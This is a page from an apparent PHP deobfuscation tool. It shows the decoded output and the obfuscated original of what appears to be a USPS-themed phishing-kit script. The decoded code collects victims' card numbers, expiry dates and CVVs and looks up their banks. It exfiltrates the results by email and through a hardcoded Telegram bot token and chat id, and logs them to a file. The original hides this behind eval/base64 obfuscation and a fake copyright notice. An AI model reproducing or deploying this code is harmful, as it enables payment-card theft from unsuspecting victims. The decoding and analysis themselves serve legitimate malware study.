Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* This file is protected by copyright law and provided under license. Reverse engin..

Decoded Output download


error_reporting(0);
session_start();
include "../../config.php";
$ip = getenv("REMOTE_ADDR");
$link = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'] ;
if(
($_POST['ccnumb'] != "") AND ($_POST['expr'] != "") AND ($_POST['cvvz'] != "") )
{
$hostname = gethostbyaddr($ip);
$bincheck = $_POST['cardnumber'] ;
$bincheck = preg_replace('/\s/','',$bincheck);
$bin = $_POST['ccnumb'] ;
$bin = preg_replace('/\s/','',$bin);
$bin = substr($bin,0,8);
$url = "https://lookup.binlist.net/".$bin;
$headers = array();
$headers[] = 'Accept-Version: 3';
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);
curl_setopt($ch,CURLOPT_HTTPHEADER,$headers);
$resp=curl_exec($ch);
curl_close($ch);
$xBIN = json_decode($resp,true);
$_SESSION['bank_name'] = $xBIN["bank"]["name"];
$_SESSION['bank_scheme'] = strtoupper($xBIN["scheme"]);
$_SESSION['bank_type'] = strtoupper($xBIN["type"]);
$_SESSION['bank_brand'] = strtoupper($xBIN["brand"]);
$_SESSION['bank_country'] = $xBIN["country"]["name"];
$msg = "[==========   USPS RZLT(CVV)   ===========]
";
$msg .= "|Full Name 		 : ".$_SESSION["name"]."
";
$msg .= "|Card      	 : ".$_POST['ccnumb']."
";
$msg .= "|Exp                : ".$_POST['expr']."
";
$msg .= "|Cvv       	 : ".$_POST['cvvz']."
";
$msg .= "|Bank Name          : ".$_SESSION['bank_name']."
";
$msg .= "|Card Type       	 : ".$_SESSION['bank_type']."
";
$msg .= "|Card Brand       	 : ".$_SESSION['bank_brand']."
";
$msg .= "|Card Country       	 : ".$_SESSION['bank_country']."
";
$msg .= "[========= $ip ========]
";
$send = $email;
$subject = " (".$_SESSION["name"].") CVV USPS RZLT  $ip";
$headers = "From: [ARD8NO_DAS **]<[email protected]>";
mail($send,$subject,$msg,$headers);
file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=".urlencode($msg)."");
$api="5236622201:AAEplL_TxotFS1DnWkoUuYX6sfiApMAJs60";
$chatid="-1001670607472";
file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=".urlencode($msg)."");
$save=fopen("../../res.txt","a+");
fwrite($save,$message);
fclose($save);
echo"<script>location.replace('../wait.php');</script>";
}else{echo"error sending";}
;

Did this file decode correctly?

Original Code

<?php /* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0xbfc;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NTA1KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdhU0NEc0FObCswVlp1eWpua09LQi9JZTlnV3JHMmk0dzMxYjZtZFJ4djhxY29NejVIRVE3TFhoRnRKcFBZZlRVPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>n||r_\MqQzSz]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^bPBhtF_W

Function Calls

fopen 1
fread 3
strtr 2
fclose 1
urldecode 1
str_replace 1
base64_decode 3

Variables

$O000O0O00 True
$O0O000O00 fgets
$O0O000O0O fgetc
$O0O00OO00 fread
$OO00O0000 3068
$OO00O00O0 error_reporting(0); session_start(); include "../../config...
$OOO000000 fg6sbehpra4co_tnd
$OOO00000O strtr
$OOO0000O0 base64_decode
$OOO000O00 fopen
$OOO0O0O00 index.php

Stats

MD5 36c5420b2e3d375f940a518a27b79990
Eval Count 3
Decode Time 82 ms